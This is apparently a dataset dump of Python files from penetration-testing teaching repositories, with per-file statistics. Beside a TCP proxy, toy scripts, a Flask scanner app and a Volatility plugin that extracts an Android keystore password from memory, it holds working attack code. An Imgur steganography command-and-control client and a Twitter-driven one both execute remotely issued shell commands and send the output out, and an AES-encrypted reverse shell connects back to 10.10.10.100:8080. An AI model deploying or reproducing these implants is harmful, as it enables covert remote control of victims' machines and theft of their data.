Logger.info('[<==] Sent to LOCAL service.')
if not len(localBuff) or not len(remoteBuff):
clientSock.close()
remoteSock.close()
Logger.info('No more data. Closing connections.')
break
def serverLoop(localHost, localPort, remoteHost, remotePort, receiveFirst):
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
serv.bind((localHost, localPort))
Logger.ok('TCP Proxy listening on: {}:{}'.format(localHost, localPort))
serv.listen(5)
except Exception as e:
Logger.err('TCP Proxy server was unable to bound to {}:{}'.format(localHost, localPort), fatal = True)
while True:
clientSock, addr = serv.accept()
Logger.info('[==>] Received incoming connection from: {}:{}'.format(addr[0], addr[1]))
proxyThread = threading.Thread(
target = proxyHandler,
args = (
clientSock,
remoteHost,
remotePort,
receiveFirst
)
)
proxyThread.start()
def processOpts(argv):
global config
usageStr = '''
tcpproxy.py [options] <LOCAL> <REMOTE>
Example:
tcpproxy.py 127.0.0.1:9000 192.168.56.102:9000
'''
parser = argparse.ArgumentParser(prog = argv[0], usage = usageStr)
parser.add_argument('localhost', metavar='LOCAL', type=str,
help = 'Local service to proxy (host:port)')
parser.add_argument('remotehost', metavar='REMOTE', type=str,
help = 'Remote service to proxy to (host:port)')
parser.add_argument('-r', '--recvfirst', dest='recvfirst', action='store_true', default = False,
help='Make the proxy first receive something, than respond.')
parser.add_argument('-t', '--timeout', metavar='timeout', dest='timeout', default = config['timeout'],
help='Specifies service connect & I/O timeout. Default: {}.'.format(config['timeout']))
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true',
help='Show verbose output.')
parser.add_argument('-d', '--debug', dest='debug', action='store_true',
help='Show more verbose, debugging output.')
if len(sys.argv[1:]) < 2:
parser.print_help()
sys.exit(0)
args = parser.parse_args()
if args.debug:
config['debug'] = args.debug
if args.verbose:
config['verbose'] = args.verbose
config['timeout'] = float(args.timeout)
Logger.dbg('Timeout set to: {} seconds.'.format(args.timeout))
return (args.localhost, args.remotehost, args.recvfirst)
def main():
local, remote, recvfirst = processOpts(sys.argv)
localHost, localPort = local.split(':')
remoteHost, remotePort = remote.split(':')
try:
localPort = int(localPort)
if localPort < 0 or localPort > 65535:
raise ValueError
except ValueError:
Logger.err('Invalid LOCAL port specified.', fatal = True)
try:
remotePort = int(remotePort)
if remotePort < 0 or remotePort > 65535:
raise ValueError
except ValueError:
Logger.err('Invalid LOCAL port specified.', fatal = True)
Logger.info('Proxying: {}:{} => {}:{}'.format(
localHost, localPort, remoteHost, remotePort
))
serverLoop(localHost, localPort, remoteHost, remotePort, recvfirst)
if __name__ == '__main__':
main()
| 31.720755 | 115 | 0.555133 |
cybersecurity-penetration-testing | from imgurpython import ImgurClient
import StegoText
import ast, os, time, shlex, subprocess, base64, random, sys
def get_input(string):
try:
return raw_input(string)
except:
return input(string)
def authenticate():
client_id = '<YOUR CLIENT ID>'
client_secret = '<YOUR CLIENT SECRET>'
client = ImgurClient(client_id, client_secret)
authorization_url = client.get_auth_url('pin')
print("Go to the following URL: {0}".format(authorization_url))
pin = get_input("Enter pin code: ")
credentials = client.authorize(pin, 'pin')
client.set_user_auth(credentials['access_token'], credentials['refresh_token'])
return client
client_uuid = "test_client_1"
client = authenticate()
a = client.get_account_albums("<YOUR IMGUR USERNAME>")
imgs = client.get_album_images(a[0].id)
last_message_datetime = imgs[-1].datetime
steg_path = StegoText.hide_message(random.choice(client.default_memes()).link,
"{'os':'" + os.name + "', 'uuid':'" + client_uuid + "','status':'ready'}",
"Imgur1.png",True)
uploaded = client.upload_from_path(steg_path)
client.album_add_images(a[0].id, uploaded['id'])
last_message_datetime = uploaded['datetime']
loop = True
while loop:
time.sleep(5)
imgs = client.get_album_images(a[0].id)
if imgs[-1].datetime > last_message_datetime:
last_message_datetime = imgs[-1].datetime
client_dict = ast.literal_eval(StegoText.extract_message(imgs[-1].link, True))
if client_dict['uuid'] == client_uuid:
command = base64.b32decode(client_dict['command'])
if command == "quit":
sys.exit(0)
args = shlex.split(command)
p = subprocess.Popen(args, stdout=subprocess.PIPE, shell=True)
(output, err) = p.communicate()
p_status = p.wait()
steg_path = StegoText.hide_message(random.choice(client.default_memes()).link,
"{'os':'" + os.name + "', 'uuid':'" + client_uuid + "','status':'response', 'response':'" + str(base64.b32encode(output)) + "'}",
"Imgur1.png", True)
uploaded = client.upload_from_path(steg_path)
client.album_add_images(a[0].id, uploaded['id'])
last_message_datetime = uploaded['datetime']
| 36.179104 | 165 | 0.576707 |
cybersecurity-penetration-testing | import random
print('I will flip a coin 1000 times. Guess how many times it will come up heads. (Press enter to begin)')
input('> ')
flips = 0
heads = 0
while flips < 1000:
if random.randint(0, 1) == 1:
heads = heads + 1
flips = flips + 1
if flips == 900:
print('900 flips and there have been ' + str(heads) + ' heads.')
if flips == 100:
print('At 100 tosses, heads has come up ' + str(heads) + ' times so far.')
if flips == 500:
print('Half way done, and heads has come up ' + str(heads) + ' times.')
print()
print('Out of 1000 coin tosses, heads came up ' + str(heads) + ' times!')
print('Were you close?') | 33.1 | 107 | 0.584435 |
cybersecurity-penetration-testing | from twitter import *
import os
from Crypto.Cipher import ARC4
import subprocess
import time
token = ''
token_key = ''
con_secret = ''
con_secret_key = ''
t = Twitter(auth=OAuth(token, token_key, con_secret, con_secret_key))
while 1:
user = t.statuses.user_timeline()
command = user[0]["text"].encode('utf-8')
key = user[1]["text"].encode('hex')
enc = ARC4.new(key)
response = subprocess.check_output(command.split())
enres = enc.encrypt(response).encode("base64")
for i in xrange(0, len(enres), 140):
t.statuses.update(status=enres[i:i+140])
time.sleep(3600)
| 23.28 | 70 | 0.655116 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python3.5
a=22;b=44;c=55;d=None
if a and b and c and d:
print("All not none")
elif b and c and d :
print('A seems to be none')
elif b and c and d :
print('A seems to be none')
elif a and c and d:
print('B seems to be None')
elif a and b and d :
print('C seems to be None')
elif a and b and c :
print('D seems to be NOne')
else:
print("Strange !!")
| 15.954545 | 28 | 0.629032 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-15
# @File : __init__.py.py
# @Desc : ""
| 16 | 27 | 0.481481 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto
# For Kali, after extract the tar file, invoke "python setup.py install"
# AES - Client - TCP Reverse Shell
import socket
import subprocess
from Crypto.Cipher import AES
counter = "H"*16
key = "H"*32
def encrypt(message):
encrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
return encrypto.encrypt(message)
def decrypt(message):
decrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
return decrypto.decrypt(message)
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.10.100', 8080))
while True:
command = decrypt(s.recv(1024))
print ' We received: ' + command
if 'terminate' in command:
s.close()
break
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send( encrypt (CMD.stdout.read() ) )
s.send( encrypt (CMD.stderr.read()) )
def main ():
connect()
main()
| 22.806452 | 127 | 0.56 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Copyright (C) 2015 Christian Hilgers, Holger Macht, Tilo Müller, Michael Spreitzenbarth
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import volatility.obj as obj
import volatility.plugins.linux.common as linux_common
import volatility.plugins.linux.pslist as linux_pslist
import volatility.plugins.linux.dalvik as dalvik
import volatility.plugins.linux.dalvik_loaded_classes as dalvik_loaded_classes
import volatility.plugins.linux.dalvik_find_class_instance as dalvik_find_class_instance
import time
###################################################################################################
class dalvik_app_password(linux_common.AbstractLinuxCommand):
###################################################################################################
def __init__(self, config, *args, **kwargs):
linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs)
dalvik.register_option_PID(self._config)
dalvik.register_option_GDVM_OFFSET(self._config)
###################################################################################################
def calculate(self):
# if no gDvm object offset was specified, use this one
if not self._config.GDVM_OFFSET:
self._config.GDVM_OFFSET = str(0x41b0)
# use linux_pslist plugin to find process address space and ID if not specified
proc_as = None
tasks = linux_pslist.linux_pslist(self._config).calculate()
for task in tasks:
if str(task.comm) == "keystore":
proc_as = task.get_process_address_space()
self._config.PID = str(task.pid)
break
# find stack
for task, vma in dalvik.get_data_section_stack(self._config):
# read length and password, they seem to have constant offset
length = obj.Object('int', offset = vma.vm_start + 0x1982c, vm = proc_as)
password = obj.Object('String', offset = vma.vm_start + 0x19830,
vm = proc_as, length = length)
yield password
###################################################################################################
def render_text(self, outfd, data):
self.table_header(outfd, [ ("Password", "20")
])
for password in data:
self.table_row( outfd,
password)
| 44.742857 | 99 | 0.546704 |
PenetrationTestingScripts | from flask import Flask, render_template
from string import digits, ascii_lowercase
from random import sample
from fuxi.views.authenticate import login_check, authenticate
from fuxi.views.index import index
from fuxi.views.vul_scanner import vul_scanner
from fuxi.views.asset_management import asset_management
from fuxi.views.plugin_management import plugin_management
from fuxi.views.settings import settings
from fuxi.views.dashboard import dashboard
from fuxi.views.port_scanner import port_scanner
from fuxi.views.subdomain_brute import subdomain_brute
from fuxi.views.acunetix_scanner import acunetix_scanner
from fuxi.views.auth_tester import auth_tester
app = Flask(__name__)
app.config['SECRET_KEY'] = ''.join(sample(digits + ascii_lowercase, 10))
app.register_blueprint(authenticate)
app.register_blueprint(index)
app.register_blueprint(vul_scanner)
app.register_blueprint(asset_management)
app.register_blueprint(plugin_management)
app.register_blueprint(settings)
app.register_blueprint(dashboard)
app.register_blueprint(port_scanner)
app.register_blueprint(subdomain_brute)
app.register_blueprint(acunetix_scanner)
app.register_blueprint(auth_tester)
@app.errorhandler(404)
@login_check
def page_not_fount(e):
return render_template('404.html'), 404
@app.errorhandler(500)
@login_check
def internal_server_error(e):
return render_template('500.html'), 500
| 31.209302 | 72 | 0.811416 |